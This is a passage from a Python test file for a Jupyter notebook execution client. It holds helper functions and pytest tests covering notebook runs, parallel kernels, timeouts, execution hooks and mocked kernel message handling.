    # if it's base64, pass it through b64 decode/encode to avoid
    # equivalent values from being considered unequal
    try:
        return b64encode(b64decode(b64_text.encode('ascii'))).decode('ascii')
    except (ValueError, TypeError):
        return b64_text


def run_notebook(filename, opts, resources=None):
    """Loads and runs a notebook, returning both the version prior to
    running it and the version after running it.
    """
    with open(filename) as f:
        input_nb = nbformat.read(f, 4)

    cleaned_input_nb = copy.deepcopy(input_nb)
    for cell in cleaned_input_nb.cells:
        if 'execution_count' in cell:
            del cell['execution_count']
        cell['outputs'] = []

    if resources:
        opts = {'resources': resources, **opts}
    executor = NotebookClient(cleaned_input_nb, **opts)

    with warnings.catch_warnings():
        # suppress warning from jupyter_client's deprecated cleanup()
        warnings.simplefilter(action='ignore', category=FutureWarning)
        # Override terminal size to standardise traceback format
        with modified_env({'COLUMNS': '80', 'LINES': '24'}):
            output_nb = executor.execute()

    return input_nb, output_nb


def run_notebook_wrapper(args):
    # since concurrent.futures.ProcessPoolExecutor doesn't have starmap,
    # we need to unpack the arguments
    return run_notebook(*args)


async def async_run_notebook(filename, opts, resources=None):
    """Loads and runs a notebook, returning both the version prior to
    running it and the version after running it.
    """
    with open(filename) as f:
        input_nb = nbformat.read(f, 4)

    cleaned_input_nb = copy.deepcopy(input_nb)
    for cell in cleaned_input_nb.cells:
        if 'execution_count' in cell:
            del cell['execution_count']
        cell['outputs'] = []

    if resources:
        opts = {'resources': resources, **opts}
    executor = NotebookClient(cleaned_input_nb, **opts)

    # Override terminal size to standardise traceback format
    with modified_env({'COLUMNS': '80', 'LINES': '24'}):
        output_nb = await executor.async_execute()

    return input_nb, output_nb


def prepare_cell_mocks(*messages_input, reply_msg=None):
    """
    This function prepares an executor object which has a fake kernel client
    to mock the messages sent over zeromq. The mock kernel client will return
    the messages passed into this wrapper back from ``preproc.kc.iopub_channel.get_msg``
    callbacks. It also appends a kernel idle message to the end of messages.
    """
    parent_id = 'fake_id'
    messages = list(messages_input)
    # Always terminate messages with an idle to exit the loop
    messages.append({'msg_type': 'status', 'content': {'execution_state': 'idle'}})

    def shell_channel_message_mock():
        # Return the message generator for
        # self.kc.shell_channel.get_msg => {'parent_header': {'msg_id': parent_id}}
        return AsyncMock(
            return_value=make_async(
                NBClientTestsBase.merge_dicts(
                    {
                        'parent_header': {'msg_id': parent_id},
                        'content': {'status': 'ok', 'execution_count': 1},
                    },
                    reply_msg or {},
                )
            )
        )

    def iopub_messages_mock():
        # Return the message generator for
        # self.kc.iopub_channel.get_msg => messages[i]
        return AsyncMock(
            side_effect=[
                # Default the parent_header so mocks don't need to include this
                make_async(
                    NBClientTestsBase.merge_dicts({'parent_header': {'msg_id': parent_id}}, msg)
                )
                for msg in messages
            ]
        )

    def prepared_wrapper(func):
        @functools.wraps(func)
        def test_mock_wrapper(self):
            """
            This inner function wrapper populates the executor object with
            the fake kernel client. This client has its iopub and shell
            channels mocked so as to fake the setup handshake and return
            the messages passed into prepare_cell_mocks as the execute_cell loop
            processes them.
            """
            cell_mock = NotebookNode(
                source='"foo" = "bar"', metadata={}, cell_type='code', outputs=[]
            )
            executor = NotebookClient({})
            executor.nb = {'cells': [cell_mock]}

            # self.kc.iopub_channel.get_msg => message_mock.side_effect[i]
            message_mock = iopub_messages_mock()
            executor.kc = MagicMock(
                iopub_channel=MagicMock(get_msg=message_mock),
                shell_channel=MagicMock(get_msg=shell_channel_message_mock()),
                execute=MagicMock(return_value=parent_id),
                is_alive=MagicMock(return_value=make_async(True)),
            )
            executor.parent_id = parent_id
            return func(self, executor, cell_mock, message_mock)

        return test_mock_wrapper

    return prepared_wrapper


def normalize_output(output):
    """
    Normalizes outputs for comparison.
    """
    output = dict(output)
    if 'metadata' in output:
        del output['metadata']
    if 'text' in output:
        output['text'] = re.sub(addr_pat, '<HEXADDR>', output['text'])
    if 'text/plain' in output.get('data', {}):
        output['data']['text/plain'] = re.sub(addr_pat, '<HEXADDR>', output['data']['text/plain'])
    if 'application/vnd.jupyter.widget-view+json' in output.get('data', {}):
        output['data']['application/vnd.jupyter.widget-view+json']['model_id'] = '<MODEL_ID>'
    if 'image/svg+xml' in output.get('data', {}):
        output['data']['image/svg+xml'] = xmltodict.parse(output['data']['image/svg+xml'])
    for key, value in output.get('data', {}).items():
        if isinstance(value, str):
            output['data'][key] = normalize_base64(value)
    if 'traceback' in output:
        tb = []
        for line in output["traceback"]:
            line = re.sub(ipython_input_pat, '<IPY-INPUT>', strip_ansi(line))
            line = re.sub(ipython8_input_pat, '<IPY-INPUT>', strip_ansi(line))
            tb.append(line)
        output['traceback'] = tb
    return output


def assert_notebooks_equal(expected, actual):
    expected_cells = expected['cells']
    actual_cells = actual['cells']
    assert len(expected_cells) == len(actual_cells)

    for expected_cell, actual_cell in zip(expected_cells, actual_cells):
        # Uncomment these to help debug test failures better
        # from pprint import pprint
        # pprint(expected_cell)
        # pprint(actual_cell)
        expected_outputs = expected_cell.get('outputs', [])
        actual_outputs = actual_cell.get('outputs', [])
        normalized_expected_outputs = list(map(normalize_output, expected_outputs))
        normalized_actual_outputs = list(map(normalize_output, actual_outputs))
        assert normalized_expected_outputs == normalized_actual_outputs

        expected_execution_count = expected_cell.get('execution_count', None)
        actual_execution_count = actual_cell.get('execution_count', None)
        assert expected_execution_count == actual_execution_count


def notebook_resources():
    """
    Prepare a notebook resources dictionary for executing test
    notebooks in the ``files`` folder.
    """
    return {'metadata': {'path': os.path.join(current_dir, 'files')}}


def filter_messages_on_error_output(err_output):
    allowed_lines = [
        # ipykernel might be installed without debugpy extension
        "[IPKernelApp] WARNING | debugpy_stream undefined, debugging will not be enabled",
    ]
    filtered_result = [line for line in err_output.splitlines() if line not in allowed_lines]
    return os.linesep.join(filtered_result)


@pytest.mark.parametrize(
    ["input_name", "opts"],
    [
        ("Other Comms.ipynb", dict(kernel_name="python")),
        ("Clear Output.ipynb", dict(kernel_name="python")),
        ("Empty Cell.ipynb", dict(kernel_name="python")),
        ("Factorials.ipynb", dict(kernel_name="python")),
        ("HelloWorld.ipynb", dict(kernel_name="python")),
        ("Inline Image.ipynb", dict(kernel_name="python")),
        (
            "Interrupt.ipynb",
            dict(kernel_name="python", timeout=1, interrupt_on_timeout=True, allow_errors=True),
        ),
        ("JupyterWidgets.ipynb", dict(kernel_name="python")),
        ("Skip Exceptions with Cell Tags.ipynb", dict(kernel_name="python")),
        ("Skip Exceptions.ipynb", dict(kernel_name="python", allow_errors=True)),
        ("Skip Execution with Cell Tag.ipynb", dict(kernel_name="python")),
        ("SVG.ipynb", dict(kernel_name="python")),
        ("Unicode.ipynb", dict(kernel_name="python")),
        ("UnicodePy3.ipynb", dict(kernel_name="python")),
        ("update-display-id.ipynb", dict(kernel_name="python")),
        ("Check History in Memory.ipynb", dict(kernel_name="python")),
    ],
)
def test_run_all_notebooks(input_name, opts):
    """Runs a series of test notebooks and compares them to their actual output"""
    input_file = os.path.join(current_dir, 'files', input_name)
    input_nb, output_nb = run_notebook(input_file, opts, notebook_resources())
    assert_notebooks_equal(input_nb, output_nb)


def test_parallel_notebooks(capfd, tmpdir):
    """Two notebooks should be able to be run simultaneously without problems.

    The two notebooks spawned here use the filesystem to check that the other
    notebook wrote to the filesystem."""
    opts = dict(kernel_name="python")
    input_name = "Parallel Execute {label}.ipynb"
    input_file = os.path.join(current_dir, "files", input_name)
    res = notebook_resources()

    with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
        threads = [
            threading.Thread(target=run_notebook, args=(input_file.format(label=label), opts, res))
            for label in ("A", "B")
        ]
        for t in threads:
            t.start()
        for t in threads:
            t.join(timeout=2)

    captured = capfd.readouterr()
    assert filter_messages_on_error_output(captured.err) == ""


def test_many_parallel_notebooks(capfd):
    """Ensure that when many IPython kernels are run in parallel, nothing awful happens.

    Specifically, many IPython kernels when run simultaneously would encounter errors
    due to using the same SQLite history database.
    """
    opts = dict(kernel_name="python", timeout=5)
    input_name = "HelloWorld.ipynb"
    input_file = os.path.join(current_dir, "files", input_name)
    res = NBClientTestsBase().build_resources()
    res["metadata"]["path"] = os.path.join(current_dir, "files")

    with warnings.catch_warnings():
        # suppress warning from jupyter_client's deprecated cleanup()
        warnings.simplefilter(action='ignore', category=FutureWarning)
        # run once, to trigger creating the original context
        run_notebook(input_file, opts, res)

        with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor:
            executor.map(run_notebook_wrapper, [(input_file, opts, res) for i in range(8)])

    captured = capfd.readouterr()
    assert filter_messages_on_error_output(captured.err) == ""


def test_async_parallel_notebooks(capfd, tmpdir):
    """Two notebooks should be able to be run simultaneously without problems.

    The two notebooks spawned here use the filesystem to check that the other
    notebook wrote to the filesystem."""
    opts = dict(kernel_name="python")
    input_name = "Parallel Execute {label}.ipynb"
    input_file = os.path.join(current_dir, "files", input_name)
    res = notebook_resources()

    with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
        tasks = [
            async_run_notebook(input_file.format(label=label), opts, res)
            for label in ("A", "B")
        ]
        loop = asyncio.get_event_loop()
        loop.run_until_complete(asyncio.gather(*tasks))

    captured = capfd.readouterr()
    assert filter_messages_on_error_output(captured.err) == ""


def test_many_async_parallel_notebooks(capfd):
    """Ensure that when many IPython kernels are run in parallel, nothing awful happens.

    Specifically, many IPython kernels when run simultaneously would encounter errors
    due to using the same SQLite history database.
    """
    opts = dict(kernel_name="python", timeout=5)
    input_name = "HelloWorld.ipynb"
    input_file = os.path.join(current_dir, "files", input_name)
    res = NBClientTestsBase().build_resources()
    res["metadata"]["path"] = os.path.join(current_dir, "files")

    # run once, to trigger creating the original context
    run_notebook(input_file, opts, res)

    tasks = [async_run_notebook(input_file, opts, res) for i in range(4)]
    loop = asyncio.get_event_loop()
    loop.run_until_complete(asyncio.gather(*tasks))

    captured = capfd.readouterr()
    assert filter_messages_on_error_output(captured.err) == ""


def test_execution_timing():
    """Compare the execution timing information stored in the cell with the
    actual time it took to run the cell. Also check for the cell timing string format."""
    opts = dict(kernel_name="python")
    input_name = "Sleep1s.ipynb"
    input_file = os.path.join(current_dir, "files", input_name)
    res = notebook_resources()
    input_nb, output_nb = run_notebook(input_file, opts, res)

    def get_time_from_str(s):
        time_format = '%Y-%m-%dT%H:%M:%S.%fZ'
        return datetime.datetime.strptime(s, time_format)

    execution_timing = output_nb['cells'][1]['metadata']['execution']
    status_busy = get_time_from_str(execution_timing['iopub.status.busy'])
    execute_input = get_time_from_str(execution_timing['iopub.execute_input'])
    execute_reply = get_time_from_str(execution_timing['shell.execute_reply'])
    status_idle = get_time_from_str(execution_timing['iopub.status.idle'])

    cell_start = get_time_from_str(output_nb['cells'][2]['outputs'][0]['text'])
    cell_end = get_time_from_str(output_nb['cells'][3]['outputs'][0]['text'])

    delta = datetime.timedelta(milliseconds=100)
    assert status_busy - cell_start < delta
    assert execute_input - cell_start < delta
    assert execute_reply - cell_end < delta
    assert status_idle - cell_end < delta


def test_synchronous_setup_kernel():
    nb = nbformat.v4.new_notebook()
    executor = NotebookClient(nb)
    with executor.setup_kernel():
        # Prove it initialized client
        assert executor.kc is not None
    # Prove it removed the client (and hopefully cleaned up)
    assert executor.kc is None


def test_startnewkernel_with_kernelmanager():
    nb = nbformat.v4.new_notebook()
    km = KernelManager()
    executor = NotebookClient(nb, km=km)
    executor.start_new_kernel()
    kc = executor.start_new_kernel_client()
    # prove it initialized client
    assert kc is not None
    # since we are not using the setup_kernel context manager,
    # cleanup has to be done manually
    kc.shutdown()
    km.cleanup_resources()
    kc.stop_channels()


def test_start_new_kernel_history_file_setting():
    nb = nbformat.v4.new_notebook()
    km = KernelManager()
    executor = NotebookClient(nb, km=km)
    kc = km.client()
    # Should start empty
    assert executor.extra_arguments == []
    # Should assign memory setting for ipykernel
    executor.start_new_kernel()
    assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
    # Should not add a second hist_file assignment
    executor.start_new_kernel()
    assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
    # since we are not using the setup_kernel context manager,
    # cleanup has to be done manually
    kc.shutdown()
    km.cleanup_resources()
    kc.stop_channels()


class TestExecute(NBClientTestsBase):
    """Contains test functions for execute.py"""

    maxDiff = None

    def test_constructor(self):
        NotebookClient({})

    def test_populate_language_info(self):
        nb = nbformat.v4.new_notebook()  # Certainly has no language_info.
        executor = NotebookClient(nb, kernel_name="python")
        nb = executor.execute()
        assert 'language_info' in nb.metadata

    def test_empty_path(self):
        """Can the kernel be started when the path is empty?"""
        filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
        res = self.build_resources()
        res['metadata']['path'] = ''
        input_nb, output_nb = run_notebook(filename, {}, res)
        assert_notebooks_equal(input_nb, output_nb)

    @pytest.mark.xfail(
        "python3" not in KernelSpecManager().find_kernel_specs(),
        reason="requires a python3 kernelspec",
    )
    def test_empty_kernel_name(self):
        """Can kernel in nb metadata be found when an empty string is passed?

        Note: this pattern should be discouraged in practice.
        Passing in no kernel_name to NotebookClient is recommended instead.
        """
        filename = os.path.join(current_dir, 'files', 'UnicodePy3.ipynb')
        res = self.build_resources()
        input_nb, output_nb = run_notebook(filename, {"kernel_name": ""}, res)
        assert_notebooks_equal(input_nb, output_nb)
        with pytest.raises(TraitError):
            input_nb, output_nb = run_notebook(filename, {"kernel_name": None}, res)

    def test_disable_stdin(self):
        """Test disabling standard input"""
        filename = os.path.join(current_dir, 'files', 'Disable Stdin.ipynb')
        res = self.build_resources()
        res['metadata']['path'] = os.path.dirname(filename)
        input_nb, output_nb = run_notebook(filename, dict(allow_errors=True), res)

        # We need to special-case this particular notebook, because the
        # traceback contains machine-specific stuff like where IPython
        # is installed. It is sufficient here to just check that an error
        # was thrown, and that it was a StdinNotImplementedError
        self.assertEqual(len(output_nb['cells']), 1)
        self.assertEqual(len(output_nb['cells'][0]['outputs']), 1)
        output = output_nb['cells'][0]['outputs'][0]
        self.assertEqual(output['output_type'], 'error')
        self.assertEqual(output['ename'], 'StdinNotImplementedError')
        self.assertEqual(
            output['evalue'],
            'raw_input was called, but this frontend does not support input requests.',
        )

    def test_timeout(self):
        """Check that an error is raised when a computation times out"""
        filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
        res = self.build_resources()
        res['metadata']['path'] = os.path.dirname(filename)

        with pytest.raises(TimeoutError) as err:
            run_notebook(filename, dict(timeout=1), res)
        self.assertEqual(
            str(err.value.args[0]),
            """A cell timed out while it was being executed, after 1 seconds.
The message was: Cell execution timed out.
Here is a preview of the cell contents:
-------------------
while True: continue
-------------------
""",
        )

    def test_timeout_func(self):
        """Check that an error is raised when a computation times out"""
        filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
        res = self.build_resources()
        res['metadata']['path'] = os.path.dirname(filename)

        def timeout_func(source):
            return 10

        with pytest.raises(TimeoutError):
            run_notebook(filename, dict(timeout_func=timeout_func), res)

    def test_kernel_death_after_timeout(self):
        """Check that an error is raised when the kernel is_alive is false after a cell timed out"""
        filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
        with open(filename) as f:
            input_nb = nbformat.read(f, 4)
        res = self.build_resources()
        res['metadata']['path'] = os.path.dirname(filename)

        executor = NotebookClient(input_nb, timeout=1)
        with pytest.raises(TimeoutError):
            executor.execute()
        km = executor.create_kernel_manager()

        async def is_alive():
            return False

        km.is_alive = is_alive
        # Will be a RuntimeError or subclass DeadKernelError depending
        # on if jupyter_client or nbconvert catches the dead client first
        with pytest.raises(RuntimeError):
            input_nb, output_nb = executor.execute()

    def test_kernel_death_during_execution(self):
        """Check that an error is raised when the kernel is_alive is false during a cell
        execution.
        """
        filename = os.path.join(current_dir, 'files', 'Autokill.ipynb')
        with open(filename) as f:
            input_nb = nbformat.read(f, 4)

        executor = NotebookClient(input_nb)
        with pytest.raises(RuntimeError):
            executor.execute()

    def test_allow_errors(self):
        """
        Check that conversion halts if ``allow_errors`` is False.
        """
        filename = os.path.join(current_dir, 'files', 'Skip Exceptions.ipynb')
        res = self.build_resources()
        res['metadata']['path'] = os.path.dirname(filename)
        with pytest.raises(CellExecutionError) as exc:
            run_notebook(filename, dict(allow_errors=False), res)
        self.assertIsInstance(str(exc.value), str)
        assert "# üñîçø∂é" in str(exc.value)

    def test_force_raise_errors(self):
        """
        Check that conversion halts if the ``force_raise_errors`` traitlet on
        NotebookClient is set to True.
        """
        filename = os.path.join(current_dir, 'files', 'Skip Exceptions with Cell Tags.ipynb')
        res = self.build_resources()
        res['metadata']['path'] = os.path.dirname(filename)
        with pytest.raises(CellExecutionError) as exc:
            run_notebook(filename, dict(force_raise_errors=True), res)
        self.assertIsInstance(str(exc.value), str)
        assert "# üñîçø∂é" in str(exc.value)

    def test_reset_kernel_client(self):
        filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')

        with open(filename) as f:
            input_nb = nbformat.read(f, 4)

        executor = NotebookClient(
            input_nb,
            resources=self.build_resources(),
        )

        executor.execute(cleanup_kc=False)
        # we didn't ask to reset the kernel client, a new one must have been created
        kc = executor.kc
        assert kc is not None

        executor.execute(cleanup_kc=False)
        # we didn't ask to reset the kernel client, the previously created one must have been reused
        assert kc == executor.kc

        executor.execute(reset_kc=True, cleanup_kc=False)
        # we asked to reset the kernel client, the previous one must have been cleaned up,
        # a new one must have been created
        assert kc != executor.kc

    def test_cleanup_kernel_client(self):
        filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')

        with open(filename) as f:
            input_nb = nbformat.read(f, 4)

        executor = NotebookClient(
            input_nb,
            resources=self.build_resources(),
        )

        executor.execute()
        # we asked to cleanup the kernel client (default is True)
        assert executor.kc is None

        executor.execute(cleanup_kc=False)
        # we didn't ask to reset the kernel client
        # a new one must have been created and should still be available
        assert executor.kc is not None

    def test_custom_kernel_manager(self):
        from .fake_kernelmanager import FakeCustomKernelManager

        filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')

        with open(filename) as f:
            input_nb = nbformat.read(f, 4)

        cleaned_input_nb = copy.deepcopy(input_nb)
        for cell in cleaned_input_nb.cells:
            if 'execution_count' in cell:
                del cell['execution_count']
            cell['outputs'] = []

        executor = NotebookClient(
            cleaned_input_nb,
            resources=self.build_resources(),
            kernel_manager_class=FakeCustomKernelManager,
        )

        # Override terminal size to standardise traceback format
        with modified_env({'COLUMNS': '80', 'LINES': '24'}):
            executor.execute()

        expected = FakeCustomKernelManager.expected_methods.items()

        for method, call_count in expected:
            self.assertNotEqual(call_count, 0, f'{method} was called')

    def test_process_message_wrapper(self):
        outputs: list = []

        class WrappedPreProc(NotebookClient):
            def process_message(self, msg, cell, cell_index):
                result = super().process_message(msg, cell, cell_index)
                if result:
                    outputs.append(result)
                return result

        current_dir = os.path.dirname(__file__)
        filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')

        with open(filename) as f:
            input_nb = nbformat.read(f, 4)

        original = copy.deepcopy(input_nb)
        wpp = WrappedPreProc(input_nb)
        executed = wpp.execute()
        assert outputs == [{'name': 'stdout', 'output_type': 'stream', 'text': 'Hello World\n'}]
        assert_notebooks_equal(original, executed)

    def test_execute_function(self):
        # Test the execute() convenience API
        filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')

        with open(filename) as f:
            input_nb = nbformat.read(f, 4)

        original = copy.deepcopy(input_nb)
        executed = execute(original, os.path.dirname(filename))
        assert_notebooks_equal(original, executed)

    def test_widgets(self):
        """Runs a test notebook with widgets and checks the widget state is saved."""
        input_file = os.path.join(current_dir, 'files', 'JupyterWidgets.ipynb')
        opts = dict(kernel_name="python")
        res = self.build_resources()
        res['metadata']['path'] = os.path.dirname(input_file)
        input_nb, output_nb = run_notebook(input_file, opts, res)

        output_data = [
            output.get('data', {}) for cell in output_nb['cells'] for output in cell['outputs']
        ]
        model_ids = [
            data['application/vnd.jupyter.widget-view+json']['model_id']
            for data in output_data
            if 'application/vnd.jupyter.widget-view+json' in data
        ]
        wdata = output_nb['metadata']['widgets']['application/vnd.jupyter.widget-state+json']
        for k in model_ids:
            d = wdata['state'][k]
            assert 'model_name' in d
            assert 'model_module' in d
            assert 'state' in d
        assert 'version_major' in wdata
        assert 'version_minor' in wdata

    def test_execution_hook(self):
        filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
        with open(filename) as f:
            input_nb = nbformat.read(f, 4)
        executor, hooks = get_executor_with_hooks(nb=input_nb)
        executor.execute()
        hooks["on_cell_start"].assert_called_once()
        hooks["on_cell_execute"].assert_called_once()
        hooks["on_cell_complete"].assert_called_once()
        hooks["on_cell_executed"].assert_called_once()
        hooks["on_cell_error"].assert_not_called()
        hooks["on_notebook_start"].assert_called_once()
        hooks["on_notebook_complete"].assert_called_once()
        hooks["on_notebook_error"].assert_not_called()

    def test_error_execution_hook_error(self):
        filename = os.path.join(current_dir, 'files', 'Error.ipynb')
        with open(filename) as f:
            input_nb = nbformat.read(f, 4)
        executor, hooks = get_executor_with_hooks(nb=input_nb)
        with pytest.raises(CellExecutionError):
            executor.execute()
        hooks["on_cell_start"].assert_called_once()
        hooks["on_cell_execute"].assert_called_once()
        hooks["on_cell_complete"].assert_called_once()
        hooks["on_cell_executed"].assert_called_once()
        hooks["on_cell_error"].assert_called_once()
        hooks["on_notebook_start"].assert_called_once()
        hooks["on_notebook_complete"].assert_called_once()
        hooks["on_notebook_error"].assert_not_called()

    def test_error_notebook_hook(self):
        filename = os.path.join(current_dir, 'files', 'Autokill.ipynb')
        with open(filename) as f:
            input_nb = nbformat.read(f, 4)
        executor, hooks = get_executor_with_hooks(nb=input_nb)
        with pytest.raises(RuntimeError):
            executor.execute()
        hooks["on_cell_start"].assert_called_once()
        hooks["on_cell_execute"].assert_called_once()
        hooks["on_cell_complete"].assert_called_once()
        hooks["on_cell_executed"].assert_not_called()
        hooks["on_cell_error"].assert_not_called()
        hooks["on_notebook_start"].assert_called_once()
        hooks["on_notebook_complete"].assert_called_once()
        hooks["on_notebook_error"].assert_called_once()

    def test_async_execution_hook(self):
        filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
        with open(filename) as f:
            input_nb = nbformat.read(f, 4)
        executor, hooks = get_executor_with_hooks(nb=input_nb)
        executor.execute()
        hooks["on_cell_start"].assert_called_once()
        hooks["on_cell_execute"].assert_called_once()
        hooks["on_cell_complete"].assert_called_once()
        hooks["on_cell_executed"].assert_called_once()
        hooks["on_cell_error"].assert_not_called()
        hooks["on_notebook_start"].assert_called_once()
        hooks["on_notebook_complete"].assert_called_once()
        hooks["on_notebook_error"].assert_not_called()

    def test_error_async_execution_hook(self):
        filename = os.path.join(current_dir, 'files', 'Error.ipynb')
        with open(filename) as f:
            input_nb = nbformat.read(f, 4)
        executor, hooks = get_executor_with_hooks(nb=input_nb)
        with pytest.raises(CellExecutionError):
            executor.execute()
        hooks["on_cell_start"].assert_called_once()
        hooks["on_cell_execute"].assert_called_once()
        hooks["on_cell_complete"].assert_called_once()
        hooks["on_cell_executed"].assert_called_once()
        hooks["on_cell_error"].assert_called_once()
        hooks["on_notebook_start"].assert_called_once()
        hooks["on_notebook_complete"].assert_called_once()
        hooks["on_notebook_error"].assert_not_called()


class TestRunCell(NBClientTestsBase):
    """Contains test functions for NotebookClient.execute_cell"""

    @prepare_cell_mocks()
    def test_idle_message(self, executor, cell_mock, message_mock):
        executor.execute_cell(cell_mock, 0)
        # Just the exit message should be fetched
        assert message_mock.call_count == 1
        # Ensure no outputs were generated
        assert cell_mock.outputs == []

    @prepare_cell_mocks(
        {
            'msg_type': 'stream',
            'header': {'msg_type': 'execute_reply'},
            'parent_header': {'msg_id': 'wrong_parent'},
            'content': {'name': 'stdout', 'text': 'foo'},
        }
    )
    def test_message_for_wrong_parent(self, executor, cell_mock, message_mock):
        executor.execute_cell(cell_mock, 0)
        # An ignored stream followed by an idle
        assert message_mock.call_count == 2
        # Ensure no output was written
        assert cell_mock.outputs == []

    @prepare_cell_mocks(
        {
            'msg_type': 'status',
            'header': {'msg_type': 'status'},
            'content': {'execution_state': 'busy'},
        }
    )
    def test_busy_message(self, executor, cell_mock, message_mock):
        executor.execute_cell(cell_mock, 0)
        # One busy message, followed by an idle
        assert message_mock.call_count == 2
        # Ensure no outputs were generated
        assert cell_mock.outputs == []

    @prepare_cell_mocks(
        {
            'msg_type': 'stream',
            'header': {'msg_type': 'stream'},
            'content': {'name': 'stdout', 'text': 'foo'},
        },
        {
            'msg_type': 'stream',
            'header': {'msg_type': 'stream'},
            'content': {'name': 'stderr', 'text': 'bar'},
        },
    )
    def test_deadline_exec_reply(self, executor, cell_mock, message_mock):
        # exec_reply is never received, so we expect to hit the timeout.
        async def get_msg(timeout):
            await asyncio.sleep(timeout)
            raise Empty

        executor.kc.shell_channel.get_msg = get_msg
        executor.timeout = 1

        with pytest.raises(TimeoutError):
            executor.execute_cell(cell_mock, 0)

        assert message_mock.call_count == 3
        # Ensure the output was captured
        self.assertListEqual(
            cell_mock.outputs,
            [
                {'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
                {'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
            ],
        )

    @prepare_cell_mocks()
    def test_deadline_iopub(self, executor, cell_mock, message_mock):
        # The shell_channel will complete, so we expect only to hit the iopub timeout.
        message_mock.side_effect = Empty()
        executor.raise_on_iopub_timeout = True

        with pytest.raises(TimeoutError):
            executor.execute_cell(cell_mock, 0)

    @prepare_cell_mocks(
        {
            'msg_type': 'stream',
            'header': {'msg_type': 'stream'},
            'content': {'name': 'stdout', 'text': 'foo'},
        },
        {
            'msg_type': 'stream',
            'header': {'msg_type': 'stream'},
            'content': {'name': 'stderr', 'text': 'bar'},
        },
    )
    def test_eventual_deadline_iopub(self, executor, cell_mock, message_mock):
        # Process a few messages before raising a timeout from iopub
        def message_seq(messages):
            yield from messages
            while True:
                yield Empty()

        message_mock.side_effect = message_seq(list(message_mock.side_effect)[:-1])
        executor.kc.shell_channel.get_msg = Mock(
            return_value=make_async({'parent_header': {'msg_id': executor.parent_id}})
        )
        executor.raise_on_iopub_timeout = True

        with pytest.raises(TimeoutError):
            executor.execute_cell(cell_mock, 0)

        assert message_mock.call_count >= 3
        # Ensure the output was captured
        self.assertListEqual(
            cell_mock.outputs,
            [
                {'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
                {'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
            ],
        )

    @prepare_cell_mocks(
        {'msg_type': 'execute_input', 'header': {'msg_type': 'execute_input'}, 'content': {}}
    )
    def test_execute_input_message(self, executor, cell_mock, message_mock):
        executor.execute_cell(cell_mock, 0)
        # One ignored execute_input, followed by an idle
        assert message_mock.call_count == 2
        # Ensure no outputs were generated
        assert cell_mock.outputs == []

    @prepare_cell_mocks(
        {
            'msg_type': 'stream',
            'header': {'msg_type': 'stream'},
            'content': {'name': 'stdout', 'text': 'foo'},
        },
        {
            'msg_type': 'stream',
            'header': {'msg_type': 'stream'},
            'content': {'name': 'stderr', 'text': 'bar'},
        },
    )
    def test_stream_messages(self, executor, cell_mock, message_mock):
        executor.execute_cell(cell_mock, 0)
        # A stdout then stderr stream followed by an idle
        assert message_mock.call_count == 3
        # Ensure the output was captured
        self.assertListEqual(
            cell_mock.outputs,
            [
                {'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
                {'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
            ],
        )

    @prepare_cell_mocks(
        {
            'msg_type': 'stream',
            'header': {'msg_type': 'execute_reply'},
            'content': {'name': 'stdout', 'text': 'foo'},
        },
        {'msg_type': 'clear_output', 'header': {'msg_type': 'clear_output'}, 'content': {}},
    )
    def test_clear_output_message(self, executor, cell_mock, message_mock):
        executor.execute_cell(cell_mock, 0)
        # A stream, followed by a clear, and then an idle
        assert message_mock.call_count == 3
        # Ensure the output was cleared
        assert cell_mock.outputs == []

    @prepare_cell_mocks(
        {
            'msg_type': 'stream',
            'header': {'msg_type': 'stream'},
            'content': {'name': 'stdout', 'text': 'foo'},
        },
        {
            'msg_type': 'clear_output',
            'header': {'msg_type': 'clear_output'},
            'content': {'wait': True},
        },
    )
    def test_clear_output_wait_message(self, executor, cell_mock, message_mock):
        executor.execute_cell(cell_mock, 0)
        # A stream, followed by a clear, and then an idle
        assert message_mock.call_count == 3
        # Should be true without another message to trigger the clear
        self.assertTrue(executor.clear_before_next_output)
        # Ensure the output wasn't cleared yet
        assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]

    @prepare_cell_mocks(
        {
            'msg_type': 'stream',
            'header': {'msg_type': 'stream'},
            'content': {'name': 'stdout', 'text': 'foo'},
        },
        {
            'msg_type': 'clear_output',
            'header': {'msg_type': 'clear_output'},
            'content': {'wait': True},
        },
        {
            'msg_type': 'stream',
            'header': {'msg_type': 'stream'},
            'content': {'name': 'stderr', 'text': 'bar'},
        },
    )
    def test_clear_output_wait_then_message_message(self, executor, cell_mock, message_mock):
        executor.execute_cell(cell_mock, 0)
        # A stdout stream, followed by a wait clear, a stderr stream, and then an idle
        assert message_mock.call_count == 4
        # Should be false after the stderr message
        assert not executor.clear_before_next_output
        # Ensure the pending clear was applied before the new stream output
        assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'}]

    @prepare_cell_mocks(
        {
            'msg_type': 'stream',
            'header': {'msg_type': 'stream'},
            'content': {'name': 'stdout', 'text': 'foo'},
        },
        {
            'msg_type': 'clear_output',
            'header': {'msg_type': 'clear_output'},
            'content': {'wait': True},
        },
        {
            'msg_type': 'update_display_data',
            'header': {'msg_type': 'update_display_data'},
            'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
        },
    )
    def test_clear_output_wait_then_update_display_message(self, executor, cell_mock, message_mock):
        executor.execute_cell(cell_mock, 0)
